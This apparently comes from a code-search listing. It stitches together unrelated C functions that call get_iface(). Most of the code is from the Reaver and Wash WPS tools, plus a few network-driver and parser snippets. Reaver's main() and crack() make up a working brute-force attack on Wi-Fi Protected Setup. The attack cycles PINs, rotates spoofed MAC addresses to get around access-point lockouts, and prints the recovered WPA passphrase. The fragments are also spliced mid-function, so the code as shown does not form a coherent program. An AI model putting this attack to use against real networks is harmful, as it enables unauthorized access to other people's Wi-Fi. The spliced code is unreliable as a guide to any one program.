int change_channel(int channel)
{
int skfd = 0, ret_val = 0;
struct iwreq wrq;
memset((void *) &wrq, 0, sizeof(struct iwreq));
/* Open NET socket */
if((skfd = iw_sockets_open()) < 0)
{
perror("iw_sockets_open");
}
else if(get_iface())
{
/* Convert channel to a frequency */
iw_float2freq((double) channel, &(wrq.u.freq));
/* Fixed frequency */
wrq.u.freq.flags = IW_FREQ_FIXED;
cprintf(VERBOSE, "[+] Switching %s to channel %d\n", get_iface(), channel);
/* Set frequency */
if(iw_set_ext(skfd, get_iface(), SIOCSIWFREQ, &wrq) >= 0)
{
set_channel(channel);
ret_val = 1;
}
iw_sockets_close(skfd);
}
return ret_val;
}
/* Closes libpcap during sleep period to avoid stale packet data in pcap buffer */
void pcap_sleep(int seconds)
{
if(seconds > 0)
{
pcap_close(get_handle());
set_handle(NULL);
sleep(seconds);
set_handle(capture_init(get_iface()));
if(!get_handle())
{
cprintf(CRITICAL, "[-] Failed to re-initialize interface '%s'\n", get_iface());
}
}
}
/* Given a destination ip address:
* - find interface the packet would be shipped through
* - return this interface's ip address as the src ip address
*/
uint32_t find_srcip(uint32_t dest) {
struct sr_instance* sr = sr_get_global_instance(0);
router_state* rs = (router_state*)sr->interface_subsystem;
iface_entry* iface_struct;
char *iface = 0;
struct in_addr dst;
struct in_addr src;
uint32_t srcip;
iface = calloc(32, sizeof(char));
dst.s_addr = dest;
src.s_addr = 0;
lock_if_list_rd(rs);
lock_rtable_rd(rs);
if(get_next_hop(&src, iface, 32, rs, &dst)) {
srcip = 0;
}
else {
iface_struct = get_iface(rs, iface);
assert(iface_struct);
srcip = iface_struct->ip;
}
unlock_rtable(rs);
unlock_if_list(rs);
return srcip;
}
static void process_msg(struct slip_context *slip)
{
u16_t vlan_tag = NET_VLAN_TAG_UNSPEC;
struct net_pkt *pkt;
pkt = slip_poll_handler(slip);
if (!pkt || !pkt->frags) {
return;
}
#if defined(CONFIG_NET_VLAN)
{
struct net_eth_hdr *hdr = NET_ETH_HDR(pkt);
if (ntohs(hdr->type) == NET_ETH_PTYPE_VLAN) {
struct net_eth_vlan_hdr *hdr_vlan =
(struct net_eth_vlan_hdr *)NET_ETH_HDR(pkt);
net_pkt_set_vlan_tci(pkt, ntohs(hdr_vlan->vlan.tci));
vlan_tag = net_pkt_vlan_tag(pkt);
}
}
#endif
if (net_recv_data(get_iface(slip, vlan_tag), pkt) < 0) {
net_pkt_unref(pkt);
}
slip->rx = NULL;
slip->last = NULL;
}
/* Populates globule->mac with the MAC address of the interface globule->iface */
int read_iface_mac()
{
struct ifreq ifr;
struct ether_addr *eth = NULL;
int sock = 0, ret_val = 0;
/* Need a socket for the ioctl call */
sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_IP);
if(sock != -1)
{
eth = malloc(sizeof(struct ether_addr));
if(eth)
{
memset(eth, 0, sizeof(struct ether_addr));
/* Prepare request */
memset(&ifr, 0, sizeof(struct ifreq));
strncpy(ifr.ifr_name, get_iface(), IFNAMSIZ);
/* Do it */
if(ioctl(sock, SIOCGIFHWADDR, &ifr) == 0)
{
set_mac((unsigned char *) &ifr.ifr_hwaddr.sa_data);
ret_val = 1;
}
free(eth);
}
close(sock);
}
return ret_val;
}
static int read_data(struct eth_context *ctx, int fd)
{
u16_t vlan_tag = NET_VLAN_TAG_UNSPEC;
struct net_if *iface;
struct net_pkt *pkt = NULL;
int status;
int count;
count = eth_read_data(fd, ctx->recv, sizeof(ctx->recv));
if (count <= 0) {
return 0;
}
#if defined(CONFIG_NET_VLAN)
{
struct net_eth_hdr *hdr = (struct net_eth_hdr *)(ctx->recv);
if (ntohs(hdr->type) == NET_ETH_PTYPE_VLAN) {
pkt = prepare_vlan_pkt(ctx, count, &vlan_tag, &status);
if (!pkt) {
return status;
}
} else {
pkt = prepare_non_vlan_pkt(ctx, count, &status);
if (!pkt) {
return status;
}
net_pkt_set_vlan_tci(pkt, 0);
}
}
#else
{
pkt = prepare_non_vlan_pkt(ctx, count, &status);
if (!pkt) {
return status;
}
}
#endif
iface = get_iface(ctx, vlan_tag);
update_gptp(iface, pkt, false);
if (net_recv_data(iface, pkt) < 0) {
net_pkt_unref(pkt);
}
return 0;
}
int change_channel(int channel)
{
cprintf(VERBOSE, "[+] Switching %s to channel %d\n", get_iface(), channel);
// Unfortunately, there is no API to change the channel
pid_t pid = fork();
if (!pid) {
char chan_arg[32];
sprintf(chan_arg, "-c%d", channel);
char* argv[] = {"/System/Library/PrivateFrameworks/Apple80211.framework/Resources/airport", chan_arg, NULL};
execve("/System/Library/PrivateFrameworks/Apple80211.framework/Resources/airport", argv, NULL);
}
int status;
waitpid(pid,&status,0);
set_channel(channel);
return 0;
}
int read_iface_mac() {
struct ifaddrs* iflist;
int found = 0;
if (getifaddrs(&iflist) == 0) {
struct ifaddrs* cur;
for (cur = iflist; cur; cur = cur->ifa_next) {
if ((cur->ifa_addr->sa_family == AF_LINK) &&
(strcmp(cur->ifa_name, get_iface()) == 0) &&
cur->ifa_addr) {
struct sockaddr_dl* sdl = (struct sockaddr_dl*)cur->ifa_addr;
set_mac(LLADDR(sdl));
found = 1;
break;
}
}
freeifaddrs(iflist);
}
return found;
}
int reaver_main(int argc, char **argv)
{
int ret_val = EXIT_FAILURE, r = 0;
time_t start_time = 0, end_time = 0;
struct wps_data *wps = NULL;
globule_init();
init_default_settings();
fprintf(stderr, "\nReaver v%s WiFi Protected Setup Attack Tool\n", get_version());
fprintf(stderr, "Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <*****@*****.**>\n\n");
if(argc < 2)
{
ret_val = reaver_usage(argv[0]);
goto end;
}
/* Process the command line arguments */
if(process_arguments(argc, argv) == EXIT_FAILURE)
{
ret_val = reaver_usage(argv[0]);
goto end;
}
/* Double check reaver_usage */
if(!get_iface() || (memcmp(get_bssid(), NULL_MAC, MAC_ADDR_LEN) == 0))
{
reaver_usage(argv[0]);
goto end;
}
/* If no MAC address was provided, get it ourselves */
if(memcmp(get_mac(), NULL_MAC, MAC_ADDR_LEN) == 0)
{
if(!read_iface_mac())
{
fprintf(stderr, "[-] Failed to retrieve a MAC address for interface '%s'!\n", get_iface());
goto end;
}
}
/* Sanity checking on the message timeout value */
if(get_m57_timeout() > M57_MAX_TIMEOUT)
{
set_m57_timeout(M57_MAX_TIMEOUT);
}
else if(get_m57_timeout() <= 0)
{
set_m57_timeout(M57_DEFAULT_TIMEOUT);
}
/* Sanity checking on the receive timeout value */
if(get_rx_timeout() <= 0)
{
set_rx_timeout(DEFAULT_TIMEOUT);
}
/* Initialize signal handlers */
sigint_init();
sigalrm_init();
/* Mark the start time */
start_time = time(NULL);
/* Do it. */
crack();
/* Mark the end time */
end_time = time(NULL);
/* Check our key status */
if(get_key_status() == KEY_DONE)
{
wps = get_wps();
cprintf(VERBOSE, "[+] Pin cracked in %d seconds\n", (int) (end_time - start_time));
cprintf(CRITICAL, "[+] WPS PIN: '%s'\n", get_pin());
if(wps->key) cprintf(CRITICAL, "[+] WPA PSK: '%s'\n", wps->key);
if(wps->essid) cprintf(CRITICAL, "[+] AP SSID: '%s'\n", wps->essid);
/* Run user-supplied command */
if(get_exec_string())
{
r = system(get_exec_string());
}
ret_val = EXIT_SUCCESS;
}
else
{
cprintf(CRITICAL, "[-] Failed to recover WPA key\n");
}
save_session();
end:
globule_deinit();
return ret_val;
}
int main(int argc, char *argv[])
{
int c = 0;
FILE *fp = NULL;
int long_opt_index = 0, i = 0, channel = 0, passive = 0, mode = 0;
int source = INTERFACE, ret_val = EXIT_FAILURE;
struct bpf_program bpf = { 0 };
char *out_file = NULL, *last_optarg = NULL, *target = NULL, *bssid = NULL;
char *short_options = "i:c:n:o:b:5sfuCDh";
struct option long_options[] = {
{ "bssid", required_argument, NULL, 'b' },
{ "interface", required_argument, NULL, 'i' },
{ "channel", required_argument, NULL, 'c' },
{ "out-file", required_argument, NULL, 'o' },
{ "probes", required_argument, NULL, 'n' },
{ "daemonize", no_argument, NULL, 'D' },
{ "file", no_argument, NULL, 'f' },
{ "ignore-fcs", no_argument, NULL, 'C' },
{ "5ghz", no_argument, NULL, '5' },
{ "scan", no_argument, NULL, 's' },
{ "survey", no_argument, NULL, 'u' },
{ "help", no_argument, NULL, 'h' },
{ 0, 0, 0, 0 }
};
fprintf(stderr, "\nWash v%s WiFi Protected Setup Scan Tool\n", PACKAGE_VERSION);
fprintf(stderr, "Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <*****@*****.**>\n\n");
globule_init();
sql_init();
create_ap_table();
set_auto_channel_select(0);
set_wifi_band(BG_BAND);
set_debug(INFO);
set_validate_fcs(1);
set_log_file(stdout);
set_max_num_probes(DEFAULT_MAX_NUM_PROBES);
while((c = getopt_long(argc, argv, short_options, long_options, &long_opt_index)) != -1)
{
switch(c)
{
case 'f':
source = PCAP_FILE;
break;
case 'i':
set_iface(optarg);
break;
case 'b':
bssid = strdup(optarg);
break;
case 'c':
channel = atoi(optarg);
set_fixed_channel(1);
break;
case '5':
set_wifi_band(AN_BAND);
break;
case 'n':
set_max_num_probes(atoi(optarg));
break;
case 'o':
out_file = strdup(optarg);
break;
case 's':
mode = SCAN;
break;
case 'u':
mode = SURVEY;
break;
case 'C':
set_validate_fcs(0);
break;
case 'D':
daemonize();
break;
default:
usage(argv[0]);
goto end;
}
/* Track the last optarg. This is used later when looping back through any specified pcap files. */
if(optarg)
{
if(last_optarg)
{
free(last_optarg);
}
last_optarg = strdup(optarg);
}
}
/* The interface value won't be set if capture files were specified; else, there should have been an interface specified */
if(!get_iface() && source != PCAP_FILE)
{
usage(argv[0]);
goto end;
}
if(get_iface() && source == PCAP_FILE)
{
cprintf(CRITICAL, "[X] ERROR: -i and -f options cannot be used together.\n");
usage(argv[0]);
goto end;
}
/* If we're reading from a file, be sure we don't try to transmit probe requests */
if(source == PCAP_FILE)
{
passive = 1;
}
/* Open the output file, if any. If none, write to stdout. */
if(out_file)
{
fp = fopen(out_file, "wb");
if(!fp)
{
cprintf(CRITICAL, "[X] ERROR: Failed to open '%s' for writing\n", out_file);
goto end;
}
set_log_file(fp);
}
/*
* Loop through all of the specified capture sources. If an interface was specified, this will only loop once and the
* call to monitor() will block indefinitely. If capture files were specified, this will loop through each file specified
* on the command line and monitor() will return after each file has been processed.
*/
for(i=argc-1; i>0; i--)
{
/* If the source is a pcap file, get the file name from the command line */
if(source == PCAP_FILE)
{
/* If we've gotten to the arguments, we're done */
if((argv[i][0] == '-') ||
(last_optarg && (memcmp(argv[i], last_optarg, strlen(last_optarg)) == 0))
)
{
break;
}
else
{
target = argv[i];
}
}
/* Else, use the specified interface name */
else
{
target = get_iface();
}
set_handle(capture_init(target));
if(!get_handle())
{
cprintf(CRITICAL, "[X] ERROR: Failed to open '%s' for capturing\n", get_iface());
goto end;
}
if(pcap_compile(get_handle(), &bpf, PACKET_FILTER, 0, 0) != 0)
{
cprintf(CRITICAL, "[X] ERROR: Failed to compile packet filter\n");
goto end;
}
if(pcap_setfilter(get_handle(), &bpf) != 0)
{
cprintf(CRITICAL, "[X] ERROR: Failed to set packet filter\n");
goto end;
}
/* Do it. */
monitor(bssid, passive, source, channel, mode);
printf("\n");
}
ret_val = EXIT_SUCCESS;
end:
globule_deinit();
sql_cleanup();
if(bssid) free(bssid);
if(out_file) free(out_file);
if(wpsmon.fp) fclose(wpsmon.fp);
return ret_val;
}
void parse_wps_settings(const u_char *packet, struct pcap_pkthdr *header, char *target, int passive, int mode, int source)
{
struct radio_tap_header *rt_header = NULL;
struct dot11_frame_header *frame_header = NULL;
struct libwps_data *wps = NULL;
enum encryption_type encryption = NONE;
char *bssid = NULL, *ssid = NULL, *lock_display = NULL;
int wps_parsed = 0, probe_sent = 0, channel = 0, rssi = 0;
static int channel_changed = 0;
char info_manufac[500];
char info_modelnum[500];
char info_modelserial[500];
wps = malloc(sizeof(struct libwps_data));
memset(wps, 0, sizeof(struct libwps_data));
if(packet == NULL || header == NULL || header->len < MIN_BEACON_SIZE)
{
goto end;
}
rt_header = (struct radio_tap_header *) radio_header(packet, header->len);
frame_header = (struct dot11_frame_header *) (packet + rt_header->len);
/* If a specific BSSID was specified, only parse packets from that BSSID */
if(!is_target(frame_header))
{
goto end;
}
set_ssid(NULL);
bssid = (char *) mac2str(frame_header->addr3, ':');
set_bssid((unsigned char *) frame_header->addr3);
if(bssid)
{
if((target == NULL) ||
(target != NULL && strcmp(bssid, target) == 0))
{
channel = parse_beacon_tags(packet, header->len);
rssi = signal_strength(packet, header->len);
ssid = (char *) get_ssid();
if(target != NULL && channel_changed == 0)
{
ualarm(0, 0);
change_channel(channel);
channel_changed = 1;
}
if(frame_header->fc.sub_type == PROBE_RESPONSE ||
frame_header->fc.sub_type == SUBTYPE_BEACON)
{
wps_parsed = parse_wps_parameters(packet, header->len, wps);
}
if(!is_done(bssid) && (get_channel() == channel || source == PCAP_FILE))
{
if(frame_header->fc.sub_type == SUBTYPE_BEACON &&
mode == SCAN &&
!passive &&
should_probe(bssid))
{
send_probe_request(get_bssid(), get_ssid());
probe_sent = 1;
}
if(!insert(bssid, ssid, wps, encryption, rssi))
{
update(bssid, ssid, wps, encryption);
}
else if(wps->version > 0)
{
switch(wps->locked)
{
case WPSLOCKED:
lock_display = YES;
break;
case UNLOCKED:
case UNSPECIFIED:
lock_display = NO;
break;
}
//ideas made by kcdtv
if(get_chipset_output == 1)
//if(1)
{
if (c_fix == 0)
{
//no use a fixed channel
cprintf(INFO,"Option (-g) REQUIRES a channel to be set with (-c)\n");
exit(0);
}
FILE *fgchipset=NULL;
char cmd_chipset[4000];
char cmd_chipset_buf[4000];
char buffint[5];
char *aux_cmd_chipset=NULL;
memset(cmd_chipset, 0, sizeof(cmd_chipset));
memset(cmd_chipset_buf, 0, sizeof(cmd_chipset_buf));
memset(info_manufac, 0, sizeof(info_manufac));
memset(info_modelnum, 0, sizeof(info_modelnum));
memset(info_modelserial, 0, sizeof(info_modelserial));
strcat(cmd_chipset,"reaver -0 -s y -vv -i "); //need option to stop reaver in m1 stage
strcat(cmd_chipset,get_iface());
strcat(cmd_chipset, " -b ");
strcat(cmd_chipset, mac2str(get_bssid(),':'));
strcat(cmd_chipset," -c ");
snprintf(buffint, sizeof(buffint), "%d",channel);
strcat(cmd_chipset, buffint);
//cprintf(INFO,"\n%s\n",cmd_chipset);
if ((fgchipset = popen(cmd_chipset, "r")) == NULL) {
printf("Error opening pipe!\n");
//return -1;
}
while (fgets(cmd_chipset_buf, 4000, fgchipset) != NULL)
{
//[P] WPS Manufacturer: xxx
//[P] WPS Model Number: yyy
//[P] WPS Model Serial Number: zzz
//cprintf(INFO,"\n%s\n",cmd_chipset_buf);
aux_cmd_chipset = strstr(cmd_chipset_buf,"[P] WPS Manufacturer:");
if(aux_cmd_chipset != NULL)
{
//bug fix by alxchk
strncpy(info_manufac, aux_cmd_chipset+21, sizeof(info_manufac));
}
aux_cmd_chipset = strstr(cmd_chipset_buf,"[P] WPS Model Number:");
if(aux_cmd_chipset != NULL)
{
//bug fix by alxchk
strncpy(info_modelnum, aux_cmd_chipset+21, sizeof(info_modelnum));
}
aux_cmd_chipset = strstr(cmd_chipset_buf,"[P] WPS Model Serial Number:");
if(aux_cmd_chipset != NULL)
{
//bug fix by alxchk
strncpy(info_modelserial, aux_cmd_chipset+28, sizeof(info_modelserial));
}
}
//cprintf(INFO,"\n%s\n",info_manufac);
info_manufac[strcspn ( info_manufac, "\n" )] = '\0';
info_modelnum[strcspn ( info_modelnum, "\n" )] = '\0';
info_modelserial[strcspn ( info_modelserial, "\n" )] = '\0';
if(pclose(fgchipset)) {
//printf("Command not found or exited with error status\n");
//return -1;
}
}
if (o_file_p == 0)
{
cprintf(INFO, "%17s %2d %.2d %d.%d %s %s\n", bssid, channel, rssi, (wps->version >> 4), (wps->version & 0x0F), lock_display, ssid);
}
else
{
if(get_chipset_output == 1)
{
cprintf(INFO, "%17s|%2d|%.2d|%d.%d|%s|%s|%s|%s|%s\n", bssid, channel, rssi, (wps->version >> 4), (wps->version & 0x0F), lock_display, ssid, info_manufac, info_modelnum, info_modelserial);
}else
{
cprintf(INFO, "%17s|%2d|%.2d|%d.%d|%s|%s\n", bssid, channel, rssi, (wps->version >> 4), (wps->version & 0x0F), lock_display, ssid);
}
}
/* Brute force all possible WPS pins for a given access point */
void crack()
{
unsigned char *bssid = NULL;
char *pin = NULL;
int fail_count = 0, loop_count = 0, sleep_count = 0, assoc_fail_count = 0;
float pin_count = 0;
time_t start_time = 0;
enum wps_result result = 0;
/* MAC CHANGER VARIABLES */
int mac_changer_counter = 0;
char mac[MAC_ADDR_LEN] = { 0 };
unsigned char mac_string [] = "ZZ:ZZ:ZZ:ZZ:ZZ:ZZ";
unsigned char* new_mac = &mac_string[0];
char last_digit = '0';
if(!get_iface())
{
return;
}
if(get_max_pin_attempts() == -1)
{
cprintf(CRITICAL, "[X] ERROR: This device has been blacklisted and is not supported.\n");
return;
}
/* Initialize network interface */
set_handle(capture_init(get_iface()));
if(get_handle() != NULL)
{
generate_pins();
/* Restore any previously saved session */
if(get_static_p1() == NULL)
{
restore_session();
}
/* Convert BSSID to a string */
bssid = mac2str(get_bssid(), ':');
/*
* We need to get some basic info from the AP, and also want to make sure the target AP
* actually exists, so wait for a beacon packet
*/
cprintf(INFO, "[+] Waiting for beacon from %s\n", bssid);
read_ap_beacon();
process_auto_options();
/* I'm fairly certian there's a reason I put this in twice. Can't remember what it was now though... */
if(get_max_pin_attempts() == -1)
{
cprintf(CRITICAL, "[X] ERROR: This device has been blacklisted and is not supported.\n");
return;
}
/* This initial association is just to make sure we can successfully associate */
while(!reassociate())
{
if(assoc_fail_count == MAX_ASSOC_FAILURES)
{
assoc_fail_count = 0;
cprintf(CRITICAL, "[!] WARNING: Failed to associate with %s (ESSID: %s)\n", bssid, get_ssid());
}
else
{
assoc_fail_count++;
}
}
cprintf(INFO, "[+] Associated with %s (ESSID: %s)\n", bssid, get_ssid());
/* Used to calculate pin attempt rates */
start_time = time(NULL);
/* If the key status hasn't been explicitly set by restore_session(), ensure that it is set to KEY1_WIP */
if(get_key_status() <= KEY1_WIP)
{
set_key_status(KEY1_WIP);
}
/*
* If we're starting a session at KEY_DONE, that means we've already cracked the pin and the AP is being re-attacked.
* Re-set the status to KEY2_WIP so that we properly enter the main cracking loop.
*/
else if(get_key_status() == KEY_DONE)
{
set_key_status(KEY2_WIP);
}
//copy the current mac to the new_mac variable for mac changer
if (get_mac_changer() == 1) {
strncpy(new_mac, mac2str(get_mac(), ':'), 16);
}
/* Main cracking loop */
for(loop_count=0, sleep_count=0; get_key_status() != KEY_DONE; loop_count++, sleep_count++)
{
//MAC Changer switch/case to define the last mac address digit
if (get_mac_changer() == 1) {
switch (mac_changer_counter) {
case 0:
last_digit = '0';
break;
case 1:
last_digit = '1';
break;
case 2:
last_digit = '2';
break;
case 3:
last_digit = '3';
break;
case 4:
last_digit = '4';
break;
case 5:
last_digit = '5';
break;
case 6:
last_digit = '6';
break;
case 7:
last_digit = '7';
break;
case 8:
last_digit = '8';
break;
case 9:
last_digit = '9';
break;
case 10:
last_digit = 'A';
break;
case 11:
last_digit = 'B';
break;
case 12:
last_digit = 'C';
break;
case 13:
last_digit = 'D';
break;
case 14:
last_digit = 'E';
break;
case 15:
last_digit = 'F';
mac_changer_counter = -1;
break;
}
mac_changer_counter++;
new_mac[16] = last_digit;
//transform the string to a MAC and define the MAC
str2mac((unsigned char *) new_mac, (unsigned char *) &mac);
set_mac((unsigned char *) &mac);
cprintf(WARNING, "[+] Using MAC %s \n", mac2str(get_mac(), ':'));
}
/*
* Some APs may do brute force detection, or might not be able to handle an onslaught of WPS
* registrar requests. Using a delay here can help prevent the AP from locking us out.
*/
pcap_sleep(get_delay());
/* Users may specify a delay after x number of attempts */
if((get_recurring_delay() > 0) && (sleep_count == get_recurring_delay_count()))
{
cprintf(VERBOSE, "[+] Entering recurring delay of %d seconds\n", get_recurring_delay());
pcap_sleep(get_recurring_delay());
sleep_count = 0;
}
/*
* Some APs identify brute force attempts and lock themselves for a short period of time (typically 5 minutes).
* Verify that the AP is not locked before attempting the next pin.
*/
while(get_ignore_locks() == 0 && is_wps_locked())
{
cprintf(WARNING, "[!] WARNING: Detected AP rate limiting, waiting %d seconds before re-checking\n", get_lock_delay());
pcap_sleep(get_lock_delay());
}
/* Initialize wps structure */
set_wps(initialize_wps_data());
if(!get_wps())
{
cprintf(CRITICAL, "[-] Failed to initialize critical data structure\n");
break;
}
/* Try the next pin in the list */
pin = build_next_pin();
if(!pin)
{
cprintf(CRITICAL, "[-] Failed to generate the next payload\n");
break;
}
else
{
cprintf(WARNING, "[+] Trying pin %s\n", pin);
}
/*
* Reassociate with the AP before each WPS exchange. This is necessary as some APs will
* severely limit our pin attempt rate if we do not.
*/
assoc_fail_count = 0;
while(!reassociate())
{
if(assoc_fail_count == MAX_ASSOC_FAILURES)
{
assoc_fail_count = 0;
cprintf(CRITICAL, "[!] WARNING: Failed to associate with %s (ESSID: %s)\n", bssid, get_ssid());
}
else
{
assoc_fail_count++;
}
}
/*
* Enter receive loop. This will block until a receive timeout occurs or a
* WPS transaction has completed or failed.
*/
result = do_wps_exchange();
switch(result)
{
/*
* If the last pin attempt was rejected, increment
* the pin counter, clear the fail counter and move
* on to the next pin.
*/
case KEY_REJECTED:
fail_count = 0;
pin_count++;
advance_pin_count();
break;
/* Got it!! */
case KEY_ACCEPTED:
break;
/* Unexpected timeout or EAP failure...try this pin again */
default:
cprintf(VERBOSE, "[!] WPS transaction failed (code: 0x%.2X), re-trying last pin\n", result);
fail_count++;
break;
}
/* If we've had an excessive number of message failures in a row, print a warning */
if(fail_count == WARN_FAILURE_COUNT)
{
cprintf(WARNING, "[!] WARNING: %d failed connections in a row\n", fail_count);
fail_count = 0;
pcap_sleep(get_fail_delay());
}
/* Display status and save current session state every DISPLAY_PIN_COUNT loops */
if(loop_count == DISPLAY_PIN_COUNT)
{
save_session();
display_status(pin_count, start_time);
loop_count = 0;
}
/*
* The WPA key and other settings are stored in the globule->wps structure. If we've
* recovered the WPS pin and parsed these settings, don't free this structure. It
* will be freed by wpscrack_free() at the end of main().
*/
if(get_key_status() != KEY_DONE)
{
wps_deinit(get_wps());
set_wps(NULL);
}
/* If we have cracked the pin, save a copy */
else
{
set_pin(pin);
}
free(pin);
pin = NULL;
/* If we've hit our max number of pin attempts, quit */
if((get_max_pin_attempts() > 0) &&
(pin_count == get_max_pin_attempts()))
{
cprintf(VERBOSE, "[+] Quitting after %d crack attempts\n", get_max_pin_attempts());
break;
}
}
if(bssid) free(bssid);
if(get_handle())
{
pcap_close(get_handle());
set_handle(NULL);
}
}
else
{
cprintf(CRITICAL, "[-] Failed to initialize interface '%s'\n", get_iface());
}
}
int load_extension_library(PARSECONTEXT * ctx, YYLTYPE *loc, const char *sval )
{
char *alt_name = 0;
SHLIB *shlib = 0;
FN_get_honey_jar_interface get_iface;
size_t i;
AST_XFUNC_DECL *xlib;
if (access( sval, R_OK )) {
alt_name = INC_PATH_resolve( ctx->lexctx.inc_path, sval );
if (!alt_name) {
char *spath;
char *sval2 = FN_set_extension( sval, SHARED_LIBRARY_EXTENSION );
if (sval2) {
alt_name = INC_PATH_resolve( ctx->lexctx.inc_path, sval2 );
}
free(sval2);
if (!alt_name) {
spath = INC_PATH_to_text( ctx->lexctx.inc_path );
do_yyerror( loc, ctx, "Can't open file %s, tried to open the file in current directory %s%s Try to specify the search path with -I <directory name> or -i <directory name> command line options.",
sval,
spath != 0 ? "and then in each directory that is part of the search path: " : 0,
spath != 0 ? spath : 0 );
goto err;
}
}
sval = alt_name;
}
shlib = (SHLIB *) malloc( sizeof( SHLIB ) );
if (!shlib || SHLIB_load( shlib, sval )) {
do_yyerror( loc, ctx, "can't load the extension library %s. %s", sval, shlib->last_error ? shlib->last_error : 0);
goto err;
}
get_iface = (FN_get_honey_jar_interface) SHLIB_get_proc_addr( shlib, "get_honey_jar_interface" );
if (!get_iface) {
do_yyerror( loc, ctx, "can't load the extension library %s. It does not have a function called get_honey_jar_interface. %s", sval, shlib->last_error ? shlib->last_error : 0);
goto err;
}
xlib = get_iface();
if (!xlib) {
do_yyerror( loc, ctx, "can't load the extension library %s. the get_honey_jar_interface did not return a value", sval );
goto err;
}
for(i=0; xlib[i].f_name != 0 ; i++ )
{
PARSECONTEXT_add_function_def( ctx, &xlib[i] );
}
ARRAY_push_back( &ctx->extension_libs, &shlib, sizeof(void *) );
return 0;
err:
if (shlib) {
SHLIB_unload(shlib);
free(shlib);
}
if (alt_name)
free(alt_name);
return 1;
}
